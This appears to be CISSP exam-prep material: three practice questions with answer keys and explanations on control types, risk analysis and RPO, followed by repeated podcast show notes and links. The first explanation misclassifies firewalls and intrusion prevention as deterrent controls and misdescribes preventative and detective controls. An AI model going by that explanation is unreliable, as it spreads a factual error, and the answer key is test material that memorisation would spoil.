You are a security consultant. A large enterprise customer hires you to ensure that their security operations are following industry standard control frameworks. For this project, the customer wants you to focus on technology solutions that will discourage malicious activities. Which type of control framework should you focus on?
A. Preventative
B. Deterrent
C. Detective
D. Corrective
E. Assessment

Answer: [B]
Explanation: Deterrent frameworks are technology-related and used to discourage malicious activities. For example, an intrusion prevention system or a firewall would be appropriate in this framework. There are three other primary control frameworks. A preventative framework helps establish security policies and security awareness training. A detective framework is focused on finding unauthorized activity in your environment after a security incident. A corrective framework focuses on activities to get your environment back after a security incident. There isn't an assessment framework.

------------------------------------

Question: 061
You are performing a risk analysis for an internet service provider (ISP) that has thousands of customers on its broadband network. Over the past 5 years, some customers have been compromised or experienced data breaches. The ISP has a large amount of monitoring and log data for all customers. You need to figure out the chances of additional customers experiencing a security incident based on that data. Which type of approach should you use for the risk analysis?
A. Qualitative
B. Quantitative
C. STRIDE
D. Reduction
E. Market

Answer: [B]
Explanation: You have three risk analysis methods to choose from: qualitative (which uses a risk analysis matrix), quantitative (which uses money or metrics to compute), or hybrid (a combination of qualitative and quantitative but not an answer choice in this scenario). Because the ISP has monitoring and log data, you should use a quantitative approach; it will help quantify the chances of additional customers experiencing a security risk. STRIDE is used for threat modeling. A market approach is used for asset valuation. A reduction analysis attempts to eliminate duplicate analysis and is tied to threat modeling.

------------------------------------

Question: 062
You are working on a business continuity project for a company that generates a large amount of content each day for use in social networks. Your team establishes 4 hours as the maximum tolerable data loss in a disaster recovery or business continuity event. In which part of the business continuity plan should you document this?
A. Recovery time objective (RTO)
B. Recovery point objective (RPO)
C. Maximum tolerable downtime (MTD)
D. Maximum data tolerance (MDT)

Answer: [B]
Explanation: The RTO establishes the maximum amount of time the organization will be down (or how long it takes to recover), the RPO establishes the maximum data loss that is tolerable, the MTD covers the maximum tolerable downtime, and MDT is just a made-up phrase used as a distraction. In this scenario, with the focus on the data loss, the correct answer is RPO.

------------------------------------

Want to find Shon elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
Online Article https://www.varonis.com/blog/threat-modeling/
CISSP Exam Questions https://blog.netwrix.com/2018/05/16/cissp-practice-exam-free-online-test-questions/
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about questions for Domain 8 (Software Development Security) of the CISSP Exam.

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

Want to find Shon Gerber elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-8-quiz-Law-Investigations-and-Ethics?q0=1&q1=0&q2=2&q3=1&q4=1&q5=1&q6=2&q7=0&q8=2&q9=0&q10=1&q11=3&q12=0&q13=3&q14=2&x=69&y=11
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about the following items that are included within Domain 8 (Software Development Security) of the CISSP Exam.

CISSP Articles – RAYGUN - SDLC: 7 phases, popular models, benefits, and more
CISSP Training – Integrate Security in the Software Development Life Cycle (SDLC)
CISSP Exam Questions

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

Want to find Shon Gerber elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
Raygun https://raygun.com/blog/software-development-life-cycle/
TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=1&q1=2&q2=2&q3=3&q4=2&q5=2&q6=2&q7=2&q8=2&q9=2&x=70&y=11

Vendors:
LastPass.com https://www.lastpass.com/
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about questions for Domain 6 (Security Assessment and Testing) of the CISSP Exam.

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

Want to find Shon Gerber elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
TechTarget https://searchsecurity.techtarget.com/quiz/Get-ready-for-CISSP-Domain-7-Cyberattack-prevention-quiz?q0=0&x=84&y=9
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about the following items that are included within Domain 7 (Security Operations) of the CISSP Exam.

CISSP Articles – Supporting Investigations
CISSP Training – Understanding and Supporting Investigations
CISSP Exam Questions

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

Want to find Shon Gerber elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
Infosec Institute https://resources.infosecinstitute.com/category/certifications-training/cissp/domains/identity-and-access-management/access-control-categories/#gref
TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-7-quiz-Business-Continuity?q0=1&q1=2&q4=0&q6=1&q7=0&q9=1&q13=3&x=95&y=8

Vendors:
LastPass.com https://www.lastpass.com/
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about questions for Domain 6 (Security Assessment and Testing) of the CISSP Exam.

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

Want to find Shon Gerber elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=0&x=77&y=10
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about the following items that are included within Domain 6 (Security Assessment and Testing) of the CISSP Exam.

CISSP Articles – Security Assessment and Testing
CISSP Training – Security Assessment and Testing
CISSP Exam Questions

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

Want to find Shon Gerber elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
Infosec Institute https://resources.infosecinstitute.com/cissp-domain-6-refresh-security-assessment-and-testing/#gref
TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-6-quiz-Vulnerabilities-in-software?q0=1&q1=1&x=78&y=3

Vendors:
LastPass.com https://www.lastpass.com/
Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about questions for Domain 5 (Identity and Access Management) of the CISSP Exam.

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

Want to find Shon Gerber elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=0&x=77&y=10